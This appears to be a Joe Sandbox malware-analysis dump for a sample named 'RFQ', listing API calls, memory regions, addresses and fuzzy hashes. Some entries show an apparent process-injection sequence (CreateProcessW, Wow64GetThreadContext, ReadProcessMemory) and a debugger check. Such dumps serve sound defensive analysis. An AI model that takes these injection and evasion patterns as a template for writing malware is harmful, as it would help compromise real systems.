• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: f9ed6921fb626db1eb1b16deb64943635b00f498bb0ca7c85fa77e62188d271c
• Instruction ID: 2b69f03eb674e5315d404e6c2d6f33fbdd8b95f4be66ecde2db4d6fcc94a04bd
• Opcode Fuzzy Hash: f9ed6921fb626db1eb1b16deb64943635b00f498bb0ca7c85fa77e62188d271c
• Instruction Fuzzy Hash: CEE08632140218B7DB311B58AC09FCA7B58AB09760F148210FB14790E1A7B52911879C
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 0077BB72
                                                                                                                                                      • Part of subcall function 00751C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00757A85), ref: 00751CB1
                                                                                                                                                      • Part of subcall function 00751C9D: GetLastError.KERNEL32(00000000,?,00757A85), ref: 00751CC3
                                                                                                                                                    • _free.LIBCMT ref: 0077BB83
                                                                                                                                                    • _free.LIBCMT ref: 0077BB95
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                                                                                                    • Instruction ID: 4109e66c27ae4ad7c49a4a5d7ed1f6f3073c419255af36903aa4195f5c035bdd
                                                                                                                                                    • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                                                                                                    • Instruction Fuzzy Hash: CAE0E2A564174186DE24A679AE48FF323CC4B043A2B54081EBC6DE7186EF68F84489B8
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 007322A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,007324F1), ref: 00732303
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007325A1
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00732618
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 007A503A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3815369404-0
                                                                                                                                                    • Opcode ID: 8ae23bf4d05324e19add38a6ea58bb491e5f8974373cbe5821fe68525841fc92
                                                                                                                                                    • Instruction ID: cf81928593ca2d356789ebc1777527823dd78645b8f67df6e80321fffd33439d
                                                                                                                                                    • Opcode Fuzzy Hash: 8ae23bf4d05324e19add38a6ea58bb491e5f8974373cbe5821fe68525841fc92
                                                                                                                                                    • Instruction Fuzzy Hash: 9A71ACB4A01285CAC314EFABA9955B5BBA8BBA8354FC0C26ED119C7772CB3D4411CF1D
                                                                                                                                                    APIs
                                                                                                                                                    • _strcat.LIBCMT ref: 007908FD
                                                                                                                                                      • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
                                                                                                                                                      • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0079098C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __itow__swprintf_strcat_wcscpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1012013722-0
                                                                                                                                                    • Opcode ID: e3cada8df0aafcbfd05481ac78cf7efb32346807555580c138d27adb2ed0e93d
                                                                                                                                                    • Instruction ID: 3869094993be4f326eea5b7c0503e1584489fa98301966a31c9b5b14a53c7474
                                                                                                                                                    • Opcode Fuzzy Hash: e3cada8df0aafcbfd05481ac78cf7efb32346807555580c138d27adb2ed0e93d
                                                                                                                                                    • Instruction Fuzzy Hash: 9F912875A10605DFCB18EF28D4959A9B7E5FF59310B51C06AE81A8F3A2DB38ED41CBC0
                                                                                                                                                    APIs
                                                                                                                                                    • IsThemeActive.UXTHEME ref: 00733A73
                                                                                                                                                      • Part of subcall function 00751405: __lock.LIBCMT ref: 0075140B
                                                                                                                                                      • Part of subcall function 00733ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00733AF3
                                                                                                                                                      • Part of subcall function 00733ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00733B08
                                                                                                                                                      • Part of subcall function 00733D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00733AA3,?), ref: 00733D45
                                                                                                                                                      • Part of subcall function 00733D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00733AA3,?), ref: 00733D57
                                                                                                                                                      • Part of subcall function 00733D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,007F1148,007F1130,?,?,?,?,00733AA3,?), ref: 00733DC8
                                                                                                                                                      • Part of subcall function 00733D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00733AA3,?), ref: 00733E48
                                                                                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00733AB3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 924797094-0
                                                                                                                                                    • Opcode ID: d371ce6973a0584c55f795c32effe9fc83166e400016beafca31e88a0aaa57f2
                                                                                                                                                    • Instruction ID: 7969f8cf2c19ebd9fa57be5a1dc05fdb698cd719af129e34ae852a19e514704d
                                                                                                                                                    • Opcode Fuzzy Hash: d371ce6973a0584c55f795c32effe9fc83166e400016beafca31e88a0aaa57f2
                                                                                                                                                    • Instruction Fuzzy Hash: C011C371904340DBC310DF29D849A5ABBE4EF94310F40C51EF445872A2DB788555CBAA
                                                                                                                                                    APIs
                                                                                                                                                    • ___lock_fhandle.LIBCMT ref: 0075EA29
                                                                                                                                                    • __close_nolock.LIBCMT ref: 0075EA42
                                                                                                                                                      • Part of subcall function 00757BDA: __getptd_noexit.LIBCMT ref: 00757BDA
                                                                                                                                                      • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1046115767-0
                                                                                                                                                    • Opcode ID: ce996917d603d4683410900d0326159328e6eb78776a1f8128270ad1bbb707a1
                                                                                                                                                    • Instruction ID: 4a5bd6da1f21927d91b68c4a363a3cdd38698d22b1dac53a35f55761b25532c7
                                                                                                                                                    • Opcode Fuzzy Hash: ce996917d603d4683410900d0326159328e6eb78776a1f8128270ad1bbb707a1
                                                                                                                                                    • Instruction Fuzzy Hash: 2C11A3B2809610CAD71ABB74D8453E83A516F82333F268350EC205B2E3C7FC9A08C6A5
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0075395C: __FF_MSGBANNER.LIBCMT ref: 00753973
                                                                                                                                                      • Part of subcall function 0075395C: __NMSG_WRITE.LIBCMT ref: 0075397A
                                                                                                                                                      • Part of subcall function 0075395C: RtlAllocateHeap.NTDLL(01020000,00000000,00000001,00000001,00000000,?,?,0074F507,?,0000000E), ref: 0075399F
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0074F51E
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0074F533
                                                                                                                                                      • Part of subcall function 00756805: RaiseException.KERNEL32(?,?,0000000E,007E6A30,?,?,?,0074F538,0000000E,007E6A30,?,00000001), ref: 00756856
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3902256705-0

APIs
  • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
• __lock_file.LIBCMT ref: 00753629
  • Part of subcall function 00754E1C: __lock.LIBCMT ref: 00754E3F
• __fclose_nolock.LIBCMT ref: 00753634
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0

APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 010656DB
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01065771
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01065793
Memory Dump Source
• Source File: 00000000.00000002.2132144203.0000000001063000.00000040.00000020.00020000.00000000.sdmp, Offset: 01063000, based on PE: false
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0

Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:

APIs
• __flush.LIBCMT ref: 00752A0B
  • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: __flush__getptd_noexit
• String ID:
• API String ID: 4101623367-0

APIs
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0

APIs
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0

APIs
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0

APIs
  • Part of subcall function 00734214: FreeLibrary.KERNEL32(00000000,?), ref: 00734247
• LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007339FE,?,00000001), ref: 007341DB
  • Part of subcall function 00734291: FreeLibrary.KERNEL32(00000000), ref: 007342C4
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: Library$Free$Load
• String ID:
• API String ID: 2391024519-0
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                    • Opcode ID: 2c9f6708c4d92e6b370cec5ffb119abb09e2e00b7c0f224f1651efb417655800
                                                                                                                                                    • Instruction ID: 1c06b6f0fc7d53d34be23c0c9d231fffbade99a87996300db8b36ffd7bcf3be4
                                                                                                                                                    • Opcode Fuzzy Hash: 2c9f6708c4d92e6b370cec5ffb119abb09e2e00b7c0f224f1651efb417655800
                                                                                                                                                    • Instruction Fuzzy Hash: C7210570508601CFDB24DF68C448B1BBBE1BF85304F154A6CFA9A4B262D73AE855DF92
                                                                                                                                                    APIs
                                                                                                                                                    • ___lock_fhandle.LIBCMT ref: 0075AFC0
                                                                                                                                                      • Part of subcall function 00757BDA: __getptd_noexit.LIBCMT ref: 00757BDA
                                                                                                                                                      • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __getptd_noexit$___lock_fhandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1144279405-0
                                                                                                                                                    • Opcode ID: 3d756b6fa4d8847d746b67b71d05609b69aa27cc7e32c6ab4dbe3cbe1cd20f7c
                                                                                                                                                    • Instruction ID: c5b67180bbc8dd39172884d1b5909a50ca94100872eca1c9865f77fbf7a5f7f8
                                                                                                                                                    • Opcode Fuzzy Hash: 3d756b6fa4d8847d746b67b71d05609b69aa27cc7e32c6ab4dbe3cbe1cd20f7c
                                                                                                                                                    • Instruction Fuzzy Hash: 44115EB2805614DBD7166FA4D84A7E97760AF41333F294250EC381B2E2D7FD9908DAA1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                    • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                                                                                                    • Instruction ID: 1fc82ecefe14bde22591cfd5f353c3a398e270c2e95e2b926b7be7c298b9e55c
                                                                                                                                                    • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                                                                                                    • Instruction Fuzzy Hash: 0301867140010DEEDF05EF64C8818FEBB74AF11344F00C169B515971A6EA34AA49CF60
                                                                                                                                                    APIs
                                                                                                                                                    • __lock_file.LIBCMT ref: 00752AED
                                                                                                                                                      • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2597487223-0
                                                                                                                                                    • Opcode ID: 983b863705b3502684e82cae62836786458ea869f9df749bfd9b9907ab7d6400
                                                                                                                                                    • Instruction ID: dbc9e8c335c31709968d649a22f79ecab1cb68858fe817d356318df2c07c2215
                                                                                                                                                    • Opcode Fuzzy Hash: 983b863705b3502684e82cae62836786458ea869f9df749bfd9b9907ab7d6400
                                                                                                                                                    • Instruction Fuzzy Hash: 01F0C271500205EADF21AF748C0A7DF36A5BF01322F148419BC109B192D7FC8A5BDB91
                                                                                                                                                    APIs
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,007339FE,?,00000001), ref: 00734286
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                    • Opcode ID: 1832d3d8792dca412fdd3fee32b6e75770b3df6a75573d8f8f05d1756ed9cef7
                                                                                                                                                    • Instruction ID: 377b34ac86975a65cfff008ca70983885e7c11882f433b2d680b60d5e10b8413
                                                                                                                                                    • Opcode Fuzzy Hash: 1832d3d8792dca412fdd3fee32b6e75770b3df6a75573d8f8f05d1756ed9cef7
                                                                                                                                                    • Instruction Fuzzy Hash: 02F0A970404302DFDB388F64D884813BBE0BF003253208A3EF1C6A2622C37AA840DF40
                                                                                                                                                    APIs
                                                                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007340C6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LongNamePath
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 82841172-0
                                                                                                                                                    • Opcode ID: 6bc6f19c9de2f70c42cbddb3b776bbaffbe89cd60ecb77a2eabf5a4df6dd68f4
                                                                                                                                                    • Instruction ID: e83cb67fe5a7916d2eda50a3cfb1db525db937e5fa1d65233c0c3caf078eb77e
                                                                                                                                                    • Opcode Fuzzy Hash: 6bc6f19c9de2f70c42cbddb3b776bbaffbe89cd60ecb77a2eabf5a4df6dd68f4
                                                                                                                                                    • Instruction Fuzzy Hash: 82E0CD365001285BC7119658CC46FEA779DDF886A0F054175F905D7244DD68AD818690
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 01065F31
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2132144203.0000000001063000.00000040.00000020.00020000.00000000.sdmp, Offset: 01063000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1063000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                    • Instruction ID: 22f3701f06cb1cdb04703667788510719f60fcc39ed9b240faffd2a4ff8c1aa4
                                                                                                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                    • Instruction Fuzzy Hash: FFE0BF7494410D9FDB00EFA4D94969E7BB4EF04301F1001A1FD0192281D63099508A62
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
                                                                                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0079F87D
                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0079F8DC
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0079F919
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0079F940
                                                                                                                                                    • SendMessageW.USER32 ref: 0079F966
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 0079F9D2
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 0079F9F3
                                                                                                                                                    • GetKeyState.USER32(00000009), ref: 0079FA00
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0079FA16
• GetKeyState.USER32(00000010), ref: 0079FA20
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0079FA4F
• SendMessageW.USER32 ref: 0079FA72
• SendMessageW.USER32(?,00001030,?,0079E059), ref: 0079FB6F
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0079FB85
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0079FB96
• SetCapture.USER32(?), ref: 0079FB9F
• ClientToScreen.USER32(?,?), ref: 0079FC03
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0079FC0F
• InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0079FC29
• ReleaseCapture.USER32 ref: 0079FC34
• GetCursorPos.USER32(?), ref: 0079FC69
• ScreenToClient.USER32(?,?), ref: 0079FC76
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0079FCD8
• SendMessageW.USER32 ref: 0079FD02
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0079FD41
• SendMessageW.USER32 ref: 0079FD6C
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0079FD84
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0079FD8F
• GetCursorPos.USER32(?), ref: 0079FDB0
• ScreenToClient.USER32(?,?), ref: 0079FDBD
• GetParent.USER32(?), ref: 0079FDD9
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0079FE3F
